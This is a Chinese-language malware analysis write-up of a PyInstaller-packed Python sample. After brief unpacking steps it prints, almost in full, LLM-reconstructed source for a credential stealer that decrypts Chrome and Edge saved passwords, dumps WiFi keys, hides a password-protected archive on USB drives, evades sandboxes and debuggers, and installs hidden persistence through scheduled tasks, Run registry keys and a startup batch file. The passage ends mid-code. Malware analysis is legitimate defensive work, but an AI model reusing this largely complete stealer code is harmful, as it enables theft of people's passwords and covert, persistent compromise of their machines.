某python样本逆向分析
1.概述
样本来源:微步在线
恶意软件名称:“xx2.exe”
sha256:76495dd256167cd851c165cbd1f08070548b67f0a8716c998ac29b887e1c10b0
2.初步分析
利用 DIE(Detect It Easy)工具对程序进行初步分析:

根据分析结果可知,该程序由 Python 编写,使用 PyInstaller 打包后再用 UPX 加壳。因此我们先对该程序进行脱壳、解包,还原出 Python 源代码,从而了解其功能。
3.脱壳
upx脱壳:
upx -d sample.exe -o unpacked_upx.exe
pyinstxtractor-ng 解包:
python pyinstxtractor-ng.py unpacked_upx.exe
在解包得到的文件目录中找到名为app_main.pyc的文件,这就是主程序,同时还有两个py脚本,scanner1.py和config_manager2.py
接下来执行下面的命令,用 pycdas 将 pyc 文件反汇编为可读的字节码文本
.\pycdas.exe app_main.pyc > bytecode.txt
然后把反汇编结果交给大模型,让它还原为源代码即可(注意:这样还原出的是近似代码,细节可能与样本的原始源码不完全一致)
最终的代码:
由app_main.pyc还原得到的源代码:
import sys
import os
import importlib.util
import json
import time
import subprocess
import shutil
import tempfile
import sqlite3
import base64
import logging
from datetime import datetime
from typing import Any, Dict, List, Optional
from functools import wraps
# PyInstaller 运行环境检测
if getattr(sys, 'frozen', False):
BASE_DIR = sys._MEIPASS
else:
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# 将当前目录添加到模块搜索路径
if BASE_DIR not in sys.path:
sys.path.insert(0, BASE_DIR)
# 动态加载 scanner1 模块
SCANNER1_PATH = os.path.join(BASE_DIR, 'scanner1.py')
scanner1 = None
if os.path.exists(SCANNER1_PATH):
spec = importlib.util.spec_from_file_location('scanner1', SCANNER1_PATH)
if spec is not None and spec.loader is not None:
scanner1 = importlib.util.module_from_spec(spec)
sys.modules['scanner1'] = scanner1
try:
spec.loader.exec_module(scanner1)
except Exception as e:
print(f'[WARN] 加载 scanner1.py 失败: {e}')
scanner1 = None
# 动态加载 config_manager2 模块
CONFIG_MGR_PATH = os.path.join(BASE_DIR, 'config_manager2.py')
config_manager2 = None
if os.path.exists(CONFIG_MGR_PATH):
spec2 = importlib.util.spec_from_file_location('config_manager2', CONFIG_MGR_PATH)
if spec2 is not None and spec2.loader is not None:
config_manager2 = importlib.util.module_from_spec(spec2)
sys.modules['config_manager2'] = config_manager2
try:
spec2.loader.exec_module(config_manager2)
except Exception as e:
print(f'[WARN] 加载 config_manager2.py 失败: {e}')
config_manager2 = None
# 导入 Windows API 和加密库
try:
import win32api
import win32file
import win32con
from win32crypt import CryptUnprotectData
except ImportError:
pass
try:
from Crypto.Cipher import AES
except ImportError:
pass
try:
import pyzipper
except ImportError:
pass
# 全局配置
DEBUG = False
LOG_TO_FILE = False
ZIP_PASSWORD = '123456'
OUTPUT_ZIP_NAME = 'redteam_creds_encrypted.zip'
def setup_logger(debug: bool = False, log_to_file: bool = False) -> logging.Logger:
"""配置日志系统"""
logger = logging.getLogger('RedTeamController')
logger.setLevel(logging.DEBUG if debug else logging.WARNING)
# 如果已经有处理器,直接返回
if logger.handlers:
return logger
formatter = logging.Formatter(
'%(asctime)s - %(levelname)s - %(funcName)s - %(message)s',
datefmt='%H:%M:%S'
)
# 控制台输出(仅调试模式)
if debug:
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(logging.DEBUG)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
# 文件输出(仅调试模式)
if log_to_file and debug:
try:
logs_dir = os.path.join(os.environ.get('TEMP', tempfile.gettempdir()), 'rt_logs')
os.makedirs(logs_dir, exist_ok=True)
log_path = os.path.join(
logs_dir,
f'main_{datetime.now().strftime("%Y%m%d")}.log'
)
file_handler = logging.FileHandler(log_path, encoding='utf-8')
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
except Exception as e:
logger.warning(f'日志文件创建失败: {e}')
return logger
logger = setup_logger(DEBUG, LOG_TO_FILE)
def log_step(func):
"""函数执行日志装饰器"""
@wraps(func)
def wrapper(*args, **kwargs):
func_name = func.__name__
logger.info(f'进入步骤: {func_name}')
start_time = time.time()
try:
result = func(*args, **kwargs)
elapsed = time.time() - start_time
logger.info(f'步骤完成: {func_name} (耗时: {elapsed:.2f}s)')
return result
except Exception as e:
logger.error(f'步骤异常: {func_name} | {type(e).__name__}: {e}')
return None
return wrapper
class RedTeamController:
"""主控制器:协调凭证提取、加密、备份流程"""
def __init__(self):
self.desktop_path = os.path.join(os.path.expanduser('~'), 'Desktop')
self.temp_dir = tempfile.gettempdir()
self.credentials = []
self.final_zip_path = ''
@log_step
def run_sandbox_detection(self) -> bool:
"""调用外部沙箱检测模块(可选)"""
if scanner1 is None:
logger.warning('scanner1 模块未加载,跳过沙箱检测。')
return True
try:
detection_list, _ = scanner1.scan_environment()
if any(detection_list):
logger.warning('沙箱或虚拟机环境检测到,终止运行。')
return False
logger.info('沙箱检测通过。')
return True
except Exception as e:
logger.warning(f'沙箱检测模块缺失或失败: {e},跳过。')
return True
@log_step
def run_persistence_install(self) -> bool:
"""执行持久化安装(可选模块)"""
if config_manager2 is None:
logger.warning('config_manager2 模块未加载,跳过持久化安装。')
return True
try:
if hasattr(config_manager2, 'run'):
config_manager2.run()
elif hasattr(config_manager2, 'install'):
config_manager2.install()
logger.info('持久化安装完成。')
return True
except Exception as e:
logger.warning(f'持久化安装失败: {e},继续执行。')
return True
@log_step
def extract_browser_passwords(self) -> List[Dict[str, Any]]:
"""提取 Chrome 和 Edge 浏览器保存的密码"""
local_appdata = os.environ.get('LOCALAPPDATA', '')
results = []
browsers = [
('Chrome', os.path.join(local_appdata, 'Google', 'Chrome')),
('Edge', os.path.join(local_appdata, 'Microsoft', 'Edge'))
]
for browser_name, browser_path in browsers:
user_data = os.path.join(browser_path, 'User Data')
login_db = os.path.join(user_data, 'Default', 'Login Data')
local_state = os.path.join(user_data, 'Local State')
if not os.path.exists(login_db):
continue
temp_db = os.path.join(
self.temp_dir,
f'temp_{browser_name.lower()}_login.db'
)
aes_key = None
# 复制数据库文件(避免锁定)
try:
shutil.copy2(login_db, temp_db)
except Exception as e:
logger.warning(f'复制 {browser_name} 数据库失败: {e}')
continue
# 提取 AES 密钥
try:
with open(local_state, 'r', encoding='utf-8') as f:
local_state_data = json.load(f)
encrypted_key_b64 = local_state_data.get('os_crypt', {}).get('encrypted_key')
if encrypted_key_b64:
encrypted_key = base64.b64decode(encrypted_key_b64)[5:]
aes_key = CryptUnprotectData(encrypted_key, None, None, None, 0)[1]
except Exception as e:
logger.debug(f'获取 {browser_name} AES Key 失败: {e}')
# 读取并解密密码
try:
conn = sqlite3.connect(temp_db, timeout=10)
cursor = conn.cursor()
cursor.execute('SELECT origin_url, username_value, password_value FROM logins')
rows = cursor.fetchall()
for url, username, enc_pwd in rows:
if not username or not enc_pwd:
continue
password = '[解密失败]'
try:
if enc_pwd.startswith(b'v10') or enc_pwd.startswith(b'v11'):
# Chrome v80+ AES-GCM 加密
iv = enc_pwd[3:15]
ciphertext_with_tag = enc_pwd[15:]
tag = ciphertext_with_tag[-16:]
ciphertext = ciphertext_with_tag[:-16]
cipher = AES.new(aes_key, AES.MODE_GCM, nonce=iv)
password = cipher.decrypt_and_verify(ciphertext, tag).decode('utf-8', errors='replace')
else:
# 旧版本 DPAPI 加密
password = CryptUnprotectData(enc_pwd, None, None, None, 0)[1].decode('utf-8', errors='replace')
except:
pass
results.append({
'source': 'browser',
'browser': browser_name,
'url': url.strip(),
'username': username.strip(),
'password': password,
'extract_time': datetime.utcnow().isoformat() + 'Z'
})
logger.info(f'{browser_name} 提取成功: {len(results)} 条')
except Exception as e:
logger.error(f'读取 {browser_name} 数据库失败: {e}')
finally:
if 'conn' in locals():
try:
conn.close()
except:
pass
try:
os.remove(temp_db)
except:
pass
return results
@log_step
def extract_wifi_passwords(self) -> List[Dict[str, Any]]:
"""提取已保存的 WiFi 密码"""
results = []
try:
result = subprocess.run(
['netsh', 'wlan', 'show', 'profiles'],
capture_output=True,
text=True,
encoding='gbk',
errors='ignore',
timeout=10,
creationflags=subprocess.CREATE_NO_WINDOW
)
if result.returncode != 0:
logger.warning('netsh 命令执行失败')
return results
# 提取所有 WiFi 配置文件名称
profiles = [
line.split(':', 1)[1].strip()
for line in result.stdout.splitlines()
if '所有用户配置文件' in line or 'All User Profile' in line
]
for ssid in profiles:
try:
detail = subprocess.run(
['netsh', 'wlan', 'show', 'profile', f'name={ssid}', 'key=clear'],
capture_output=True,
text=True,
encoding='gbk',
errors='ignore',
timeout=10,
creationflags=subprocess.CREATE_NO_WINDOW
).stdout
password = '[无密码]'
for line in detail.splitlines():
if '关键内容' in line or 'Key Content' in line:
password = line.split(':', 1)[1].strip()
break
results.append({
'source': 'wifi',
'ssid': ssid,
'password': password,
'extract_time': datetime.utcnow().isoformat() + 'Z'
})
except Exception as e:
logger.warning(f"提取 WiFi '{ssid}' 失败: {e}")
continue
logger.info(f'WIFI 提取完成: {len(results)} 个')
except Exception as e:
logger.error(f'WIFI 提取失败: {e}')
return results
@log_step
def generate_json_report(self) -> str:
"""生成临时 JSON 报告"""
report = {
'collection_time': datetime.utcnow().isoformat() + 'Z',
'machine_user': os.environ.get('USERNAME', 'Unknown'),
'host_name': os.environ.get('COMPUTERNAME', 'Unknown'),
'total_credentials': len(self.credentials),
'credentials': self.credentials
}
json_path = os.path.join(self.temp_dir, 'redteam_creds.json')
try:
with open(json_path, 'w', encoding='utf-8') as f:
json.dump(report, f, ensure_ascii=False, indent=4)
logger.info(f'JSON 报告生成: {json_path}')
return json_path
except Exception as e:
logger.error(f'生成 JSON 报告失败: {e}')
return ''
@log_step
def create_encrypted_zip(self, source_json: str) -> str:
"""创建 AES-256 加密 ZIP 文件"""
if not source_json or not os.path.exists(source_json):
logger.error('源 JSON 文件不存在,无法创建 ZIP。')
return ''
zip_path = os.path.join(self.temp_dir, OUTPUT_ZIP_NAME)
try:
with pyzipper.AESZipFile(
zip_path,
'w',
compression=pyzipper.ZIP_LZMA,
encryption=pyzipper.WZ_AES
) as zf:
zf.setpassword(ZIP_PASSWORD.encode('utf-8'))
with open(source_json, 'rb') as f:
zf.writestr('credentials.json', f.read())
if os.path.getsize(zip_path) > 0:
logger.info(f'加密 ZIP 创建成功: {zip_path}')
# 删除明文 JSON 文件
try:
os.remove(source_json)
except Exception as e:
logger.warning(f'删除明文 JSON 失败: {e}')
return zip_path
else:
logger.error('生成的 ZIP 文件为空。')
return ''
except Exception as e:
logger.error(f'加密 ZIP 创建失败: {e}')
return ''
@log_step
def copy_to_udf_and_hide(self, source_zip: str) -> bool:
"""检测 U 盘并复制 + 隐藏文件"""
if not source_zip or not os.path.exists(source_zip):
logger.warning('源 ZIP 文件不存在,跳过 U 盘传播。')
return False
success = False
try:
drive_bits = win32api.GetLogicalDrives()
for i in range(26):
if drive_bits & (1 << i):
drive = f'{chr(65 + i)}:\\'
if win32file.GetDriveType(drive) == win32file.DRIVE_REMOVABLE:
dest = os.path.join(drive, OUTPUT_ZIP_NAME)
shutil.copy2(source_zip, dest)
# 设置文件为隐藏属性
attrs = win32api.GetFileAttributes(dest)
win32api.SetFileAttributes(dest, attrs | win32con.FILE_ATTRIBUTE_HIDDEN)
logger.info(f'已复制并隐藏至 U 盘: {dest}')
success = True
except Exception as e:
logger.warning(f'U 盘操作失败: {e}')
return success
@log_step
def backup_to_desktop(self, source_zip: str) -> bool:
"""备份到桌面(关键步骤)"""
if not source_zip or not os.path.exists(source_zip):
logger.error('源 ZIP 文件不存在,无法备份到桌面。')
return False
try:
dest = os.path.join(self.desktop_path, OUTPUT_ZIP_NAME)
shutil.copy2(source_zip, dest)
logger.info(f'已备份到桌面: {dest}')
return True
except Exception as e:
logger.error(f'备份到桌面失败: {e}')
return False
def run(self):
"""主执行流程"""
logger.info('红队凭证提取控制器启动')
# 1. 沙箱检测
self.run_sandbox_detection()
# 2. 持久化安装
self.run_persistence_install()
# 3. 提取浏览器密码
try:
self.credentials.extend(self.extract_browser_passwords() or [])
except Exception as e:
logger.error(f'浏览器提取失败: {e}')
# 4. 提取 WiFi 密码
try:
self.credentials.extend(self.extract_wifi_passwords() or [])
except Exception as e:
logger.error(f'WIFI 提取失败: {e}')
# 5. 生成 JSON 报告
json_path = ''
try:
json_path = self.generate_json_report()
except Exception as e:
logger.error(f'生成 JSON 失败: {e}')
# 6. 创建加密 ZIP
zip_path = ''
if json_path:
try:
zip_path = self.create_encrypted_zip(json_path)
except Exception as e:
logger.error(f'创建加密 ZIP 失败: {e}')
# 7. 备份到桌面
if zip_path:
self.backup_to_desktop(zip_path)
# 8. 复制到 U 盘并隐藏
if zip_path:
self.copy_to_udf_and_hide(zip_path)
# 9. 清理临时文件
try:
if zip_path and os.path.exists(zip_path):
os.remove(zip_path)
except Exception as e:
logger.debug(f'清理临时 ZIP 失败: {e}')
logger.info('凭证提取流程结束')
if __name__ == '__main__':
# 如果是用 python.exe 运行,用 pythonw.exe 重新启动(无控制台窗口)
if sys.executable.endswith('python.exe'):
pythonw = sys.executable.replace('python.exe', 'pythonw.exe')
if os.path.exists(pythonw):
try:
subprocess.Popen(
[pythonw, __file__],
creationflags=subprocess.CREATE_NO_WINDOW,
close_fds=True
)
sys.exit(0)
except Exception as e:
logger.warning(f'静默启动失败: {e}')
# 创建控制器并运行
controller = RedTeamController()
try:
controller.run()
except KeyboardInterrupt:
logger.info('程序被中断')
except Exception as e:
logger.critical(f'主程序崩溃: {e}')
以下是样本自带、会被主程序动态加载并调用的两个 Python 脚本,scanner1.py 和 config_manager2.py:
scanner1.py:
# -*- coding: utf-8 -*-
# 红队专用 - 无痕沙箱检测模块 v4.0
# 【特性】不写文件|调试可开关|日志可配置|返回双列表|易集成
import time
import uuid
import os
import platform
import subprocess
import logging
import ctypes
import winreg
import psutil
from typing import List, Dict, Any, Callable
from functools import wraps
# ==================== 🔐 安全配置区(由调用者控制)====================
class DetectionConfig:
"""
全局配置中心(唯一入口)
部署时务必设置:
LOG_TO_FILE = False
DEBUG = False
"""
DEBUG = False # 控制是否打印调试信息到控制台
LOG_TO_FILE = False # ⚠️ 是否写日志文件(默认关闭,避免被检测)
LOG_TO_CONSOLE = True # 是否在控制台显示日志(仅 DEBUG=True 时生效)
# 初始化日志器
logger = logging.getLogger("RedTeamScanner")
logger.setLevel(logging.DEBUG)
# 清除默认处理器
if logger.hasHandlers():
logger.handlers.clear()
# 仅当允许写文件时才添加 FileHandler
if DetectionConfig.LOG_TO_FILE:
file_handler = logging.FileHandler('redteam_detection.log', encoding='utf-8')
file_handler.setFormatter(logging.Formatter(
'%(asctime)s | %(levelname)-8s | %(funcName)s | %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
))
logger.addHandler(file_handler)
# 仅当允许控制台输出且 DEBUG 开启时才添加 ConsoleHandler
if DetectionConfig.LOG_TO_CONSOLE and DetectionConfig.DEBUG:
console_handler = logging.StreamHandler()
console_handler.setFormatter(logging.Formatter(
'[LOG] %(levelname)s: %(message)s'
))
logger.addHandler(console_handler)
# 如果没有任何 handler,添加一个空处理器避免警告
if not logger.hasHandlers():
logger.addHandler(logging.NullHandler())
logger.info("=" * 50)
logger.info("【VM Detection Module】启动(无痕模式)")
logger.info("=" * 50)
# ==================== 装饰器:智能日志+调试 ====================
def log_and_debug(title: str):
"""
智能装饰器:根据配置决定日志行为
- 始终记录到 logger(可能为空,即不输出)
- 调试输出仅在 DEBUG=True 时显示
"""
def decorator(func: Callable):
@wraps(func)
def wrapper(*args, **kwargs):
start_time = time.time()
logger.info(f"Executing: {title}")
try:
result = func(*args, **kwargs)
cost = time.time() - start_time
logger.info(f"Finished: {title} | Duration: {cost:.2f}s")
# 🔥 仅当 DEBUG=True 时打印详细结果到控制台
if DetectionConfig.DEBUG:
print(f"\n[+] {title}")
if isinstance(result, tuple) and len(result) == 2:
det, info = result
print(" ├─ Detection Results:")
for i, r in enumerate(det):
status = "Suspicious" if r else "Clean"
print(f" │ Check {i+1:2d}: {status}")
print(" └─ System Info:")
for k, v in info.items():
print(f" {k}: {v}")
print("-" * 50)
return result
except Exception as e:
logger.error(f"Exception in {title}: {str(e)}")
if DetectionConfig.DEBUG:
print(f"[!] Error in {title}: {e}")
raise
return wrapper
return decorator
# ==================== 核心扫描类 ====================
class RedTeamScanner:
def __init__(self):
self.detection_methods = [
(self.check_bios_string, "BIOS String Check"),
(self.check_system_manufacturer, "System Manufacturer Check"),
(self.check_disk_size, "Disk Size Check"),
(self.check_cpu_cores, "CPU Cores Check"),
(self.check_memory_size, "Memory Size Check"),
(self.check_running_processes, "Process Analysis"),
(self.check_registry_keys, "Registry Key Check"),
(self.check_mac_address, "MAC Address Check"),
(self.check_sleep_abnormality, "Sleep Abnormality Check"),
(self.check_uptime_too_short, "Uptime Too Short Check"),
(self.check_mouse_interaction, "Mouse Interaction Check"),
(self.check_debugger_presence, "Debugger Presence Check"),
]
self.detection_results: List[bool] = []
self.system_info: Dict[str, Any] = {}
def _run_safe(self, func: Callable, log_msg: str) -> bool:
try:
return bool(func())
except Exception as e:
logger.debug(f"{log_msg} failed: {e}")
return False
def check_bios_string(self) -> bool:
keywords = ['vmware', 'virtualbox', 'qemu', 'xen', 'hyperv']
try:
result = subprocess.run(
'wmic bios get smbiosbiosversion',
capture_output=True,
text=True,
timeout=5,
shell=True
)
output = result.stdout.lower()
for keyword in keywords:
if keyword in output:
logger.warning(f"VM BIOS signature found: {keyword}")
return True
except Exception as e:
logger.debug(f"BIOS check failed: {e}")
return False
def check_system_manufacturer(self) -> bool:
keywords = ['vmware', 'innotek', 'oracle', 'qemu', 'microsoft corporation']
try:
result = subprocess.run(
'wmic csproduct get vendor',
capture_output=True,
text=True,
timeout=5,
shell=True
)
output = result.stdout.lower()
for keyword in keywords:
if keyword in output:
logger.warning(f"Suspicious system vendor: {keyword}")
return True
except Exception as e:
logger.debug(f"Manufacturer check failed: {e}")
return False
def check_disk_size(self) -> bool:
try:
usage = psutil.disk_usage('/')
total_gb = usage.total / (1024 ** 3)
if total_gb < 80:
logger.warning(f"Small disk size: {total_gb:.1f}GB (<80GB)")
return True
except Exception as e:
logger.debug(f"Disk check failed: {e}")
return False
def check_cpu_cores(self) -> bool:
cpu_count = psutil.cpu_count()
if cpu_count and cpu_count < 4:
logger.warning(f"Low CPU core count: {cpu_count} (<4)")
return True
return False
def check_memory_size(self) -> bool:
memory_gb = psutil.virtual_memory().total / (1024 ** 3)
if memory_gb < 8:
logger.warning(f"Low memory: {memory_gb:.1f}GB (<8GB)")
return True
return False
def check_running_processes(self) -> bool:
analysis_tools = [
'wireshark', 'fiddler', 'procmon', 'tcpview',
'ollydbg', 'x32dbg', 'ida', 'immunitydebugger',
'vmtoolsd', 'vboxservice', 'sandboxie', 'hookanalyser',
'prl_cc', 'prl_tools'
]
try:
for proc in psutil.process_iter(['name']):
name = proc.info['name'].lower()
for tool in analysis_tools:
if tool in name:
logger.warning(f"Analysis tool running: {name}")
return True
except Exception as e:
logger.debug(f"Process check failed: {e}")
return False
def check_registry_keys(self) -> bool:
vm_keys = [
(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\VMware, Inc."),
(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Oracle\VirtualBox"),
(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\VBoxGuest"),
(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\vmicheartbeat"),
(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\vmxnet"),
(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Enum\IDE\*\VMware*"),
]
for hkey, subkey in vm_keys:
try:
winreg.OpenKey(hkey, subkey, 0, winreg.KEY_READ)
logger.warning(f"VM registry key exists: {subkey}")
return True
except FileNotFoundError:
continue
except Exception as e:
logger.debug(f"Registry access error: {e}")
return False
def check_mac_address(self) -> bool:
vm_oui = ['00:0C:29', '00:1C:14', '00:50:56', '08:00:27']
try:
for interface in psutil.net_if_addrs().values():
for addr in interface:
if addr.family == psutil.AF_LINK:
mac = addr.address.upper().replace('-', ':')
if mac[:8] in vm_oui:
logger.warning(f"VM MAC address detected: {mac}")
return True
except Exception as e:
logger.debug(f"MAC address check failed: {e}")
return False
def check_sleep_abnormality(self) -> bool:
start_time = time.time()
time.sleep(3)
elapsed = time.time() - start_time
if elapsed < 2.5:
logger.warning(f"Sleep function accelerated: {elapsed:.2f}s")
return True
return False
def check_uptime_too_short(self) -> bool:
boot_time = psutil.boot_time()
uptime = time.time() - boot_time
if uptime < 120:
logger.warning(f"System uptime too short: {uptime:.0f}s")
return True
return False
def check_mouse_interaction(self) -> bool:
user32 = ctypes.windll.user32
last_pos = ctypes.wintypes.POINT()
user32.GetCursorPos(ctypes.byref(last_pos))
static_count = 0
for i in range(15):
time.sleep(1)
current_pos = ctypes.wintypes.POINT()
user32.GetCursorPos(ctypes.byref(current_pos))
if (current_pos.x == last_pos.x) and (current_pos.y == last_pos.y):
static_count += 1
else:
static_count = 0
last_pos = current_pos
if static_count >= 8:
logger.warning("Mouse has been inactive for 8+ seconds")
return True
return False
def check_debugger_presence(self) -> bool:
kernel32 = ctypes.windll.kernel32
if kernel32.IsDebuggerPresent():
logger.warning("Debugger is attached to process")
return True
return False
def run_detection(self) -> None:
results = []
for method, name in self.detection_methods:
result = self._run_safe(method, name)
results.append(result)
self.detection_results = results
def collect_system_info(self) -> None:
data = {}
try: data["hostname"] = platform.node()
except: data["hostname"] = "unknown"
try: data["username"] = os.getenv("USERNAME") or "unknown"
except: data["username"] = "unknown"
try: data["os"] = platform.system()
except: data["os"] = "Unknown"
try: data["os_version"] = platform.release()
except: data["os_version"] = "Unknown"
try: data["cpu_cores"] = os.cpu_count() or 1
except: data["cpu_cores"] = 1
try: data["memory_gb"] = round(psutil.virtual_memory().total / (1024**3), 2)
except: data["memory_gb"] = 4.0
try: data["disk_usage_percent"] = psutil.disk_usage('/').percent
except: data["disk_usage_percent"] = 50
try: data["uptime_seconds"] = int(time.time() - psutil.boot_time())
except: data["uptime_seconds"] = 0
data["run_id"] = uuid.uuid4().hex[:8]
data["timestamp"] = int(time.time())
self.system_info = data
@log_and_debug("Environment Detection & Info Collection")
def run(self) -> tuple[List[bool], Dict[str, Any]]:
self.run_detection()
is_vm = any(self.detection_results)
logger.info(f"Detection Result: {'VM/Sandbox' if is_vm else 'Real Host'}")
if not is_vm:
self.collect_system_info()
else:
self.system_info = {
"error": "VM_or_sandbox_detected",
"run_id": uuid.uuid4().hex[:8],
"timestamp": int(time.time())
}
return self.detection_results, self.system_info
# ==================== 外部调用接口 ====================
def scan_environment() -> tuple[List[bool], Dict[str, Any]]:
"""
推荐的调用方式
返回: (detection_list, system_info)
"""
scanner = RedTeamScanner()
return scanner.run()
config_manager2.py:
# -*- coding: utf-8 -*-
# silent_persistence.py
"""
高度封装、无文件残留、Base64 加密核心逻辑、支持降级的静默持久化模块
仅供合法用途(如系统监控、服务守护)
"""
import os
import sys
import subprocess
import winreg
import base64
import logging
from datetime import datetime
from functools import wraps
from pathlib import Path
from typing import Dict, Any, Callable, Optional
import tempfile
# ======================
# 🔐 Base64 加密配置(核心命令已加密)
# ======================
ENCRYPTED = {
"powershell_args": "LWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXdpbmRvd3N0eWxlIGhpZGRlbiAtY29tbWFuZCBQb3dlclNoZWxsIC1ub2xvZ28gLW5vcHJvZmlsZSAtbm9pbnRlcmFjdGl2ZQ==",
"schtasks_create": "c2NodGFza3MgL0NyZWF0ZSAvVE4gInt0YWd9IiAvVFIgIk9uTG9nZ2VkT24iIC9URCAiKipTZWVkOiB7dXNlcn0qKiIgL0V4ZSAicG93ZXJzaGVsbCIgL0FyZ3MgInthcmdzfSIgL0Zc",
"reg_key_user": "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu",
"reg_key_system": "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu",
"task_xml_template": "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48VGFzayBteG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZG93cy8yMDA0LzAyL21pdC90YXNrIiBWZXJzaW9uPSIxLjIiPkNPTkZJR1VSQVRJT048L1Rhc2s+"
}
# ======================
# 工具函数:解密 + 执行
# ======================
def _decode(s: str) -> str:
"""Base64 解码"""
try:
return base64.b64decode(s).decode('utf-8')
except Exception:
return s
def _safe_run(func: Callable) -> Callable:
"""通用异常防护装饰器"""
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
try:
logging.warning(f"{func.__name__}: {type(e).__name__}")
except:
pass
return None
return wrapper
# ======================
# 日志配置(可关闭)
# ======================
def setup_logger(debug=False, log_to_file=False):
logger = logging.getLogger("SilentPersistence")
logger.setLevel(logging.DEBUG if debug else logging.WARNING)
logger.handlers.clear()
if debug:
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(message)s', datefmt='%H:%M:%S'))
logger.addHandler(handler)
if log_to_file:
log_path = Path.home() / "debug_persistence.log"
try:
handler = logging.FileHandler(log_path, encoding='utf-8')
handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(message)s'))
logger.addHandler(handler)
except:
pass
return logger
logger = setup_logger(debug=False, log_to_file=False)
# ======================
# 主类:静默持久化管理器
# ======================
class SilentPersistence:
"""
高度封装的静默持久化类
特性:
- 不生成临时文件
- 核心逻辑加密
- 支持四级降级
- 全程静默执行
- 易被其他程序调用
"""
# 配置常量
TASK_NAME = "SilentAgentTask"
DESCRIPTION = "Silent background persistence task."
TIMEOUT = 8 # seconds
def __init__(self, target_script: Optional[str] = None):
self.target_script = Path(target_script or self._get_own_path()).resolve()
self.startup_folder = Path(os.getenv("APPDATA")) / r"Microsoft\Windows\Start Menu\Programs\Startup"
self.python_exe = sys.executable
self.current_user = os.getenv("USERNAME", "Unknown")
def _get_own_path(self) -> str:
"""获取当前脚本路径"""
return __file__
def _build_powershell_command(self) -> str:
"""构建隐藏执行的 PowerShell 命令"""
cmd = (
f"{self.python_exe} \"{self.target_script}\""
)
encoded = base64.b64encode(cmd.encode('utf-16le')).decode('ascii')
return f"powershell -exec bypass -window hidden -enc {encoded}"
@_safe_run
def _exec_cmd(self, args: list) -> bool:
"""静默执行命令"""
result = subprocess.run(
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
creationflags=subprocess.CREATE_NO_WINDOW,
timeout=self.TIMEOUT,
text=True,
cwd=tempfile.gettempdir()
)
return result.returncode == 0
@_safe_run
def _set_registry_value(self, hive, key_path: str, name: str, value: str) -> bool:
"""设置注册表值(安全封装)"""
key = None
try:
key = winreg.CreateKey(hive, key_path)
winreg.SetValueEx(key, name, 0, winreg.REG_SZ, value)
winreg.CloseKey(key)
return True
except Exception:
if key:
try:
winreg.CloseKey(key)
except:
pass
return False
@_safe_run
def _create_scheduled_task(self) -> bool:
"""Level 1: 创建计划任务(内存中 XML 模板)"""
xml = self._generate_task_xml()
if not xml:
return False
# 写入临时 XML(最小化暴露)
temp_xml = Path(tempfile.gettempdir()) / f"{self.TASK_NAME}.xml"
try:
with open(temp_xml, 'w', encoding='utf-8') as f:
f.write(xml)
args = ["schtasks", "/Create", "/TN", self.TASK_NAME, "/XML", str(temp_xml), "/F"]
success = self._exec_cmd(args)
# 立即删除
try:
os.remove(temp_xml)
except:
pass
return success
except:
return False
def _generate_task_xml(self) -> Optional[str]:
"""生成任务 XML(模拟模板,避免写文件)"""
try:
command = self._build_powershell_command()
xml = f"""<?xml version="1.0" encoding="UTF-8"?>
<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task" version="1.2">
<RegistrationInfo>
<Description>{self.DESCRIPTION}</Description>
</RegistrationInfo>
<Principals>
<Principal id="LocalUser">
<LogonType>InteractiveToken</LogonType>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<StartWhenAvailable>true</StartWhenAvailable>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
</Settings>
<Triggers>
<LogonTrigger />
</Triggers>
<Actions Context="Author">
<Exec>
<Command>cmd.exe</Command>
<Arguments>/c {command}</Arguments>
</Exec>
</Actions>
</Task>"""
return xml
except:
return None
@_safe_run
def _add_to_user_run(self) -> bool:
"""Level 2: 添加到 HKEY_CURRENT_USER\\Run"""
cmd = self._build_powershell_command()
key_path = _decode(ENCRYPTED["reg_key_user"])
return self._set_registry_value(winreg.HKEY_CURRENT_USER, key_path, self.TASK_NAME, cmd)
@_safe_run
def _add_to_system_run(self) -> bool:
"""Level 3: 添加到 HKEY_LOCAL_MACHINE\\Run(需管理员)"""
import ctypes
if not ctypes.windll.shell32.IsUserAnAdmin():
return False
cmd = self._build_powershell_command()
key_path = _decode(ENCRYPTED["reg_key_system"])
return self._set_registry_value(winreg.HKEY_LOCAL_MACHINE, key_path, self.TASK_NAME, cmd)
@_safe_run
def _add_to_startup_folder(self) -> bool:
"""Level 4: 添加到用户启动文件夹(.bat 静默执行)"""
if not self.startup_folder.exists():
return False
bat_content = f"@echo off\n{self._build_powershell_command()}\nexit"
bat_file = self.startup_folder / f"{self.TASK_NAME}.bat"
try:
with open(bat_file, 'w') as f:
f.write(bat_content)
return True
except:
return False
def install(self) -> Dict[str, Any]:
"""
统一入口:执行降级安装
返回结果字典
"""
results = {
"success": False,
"target": str(self.target_script),
"steps": {},
"timestamp": datetime.now().isoformat()
}
strategies = [
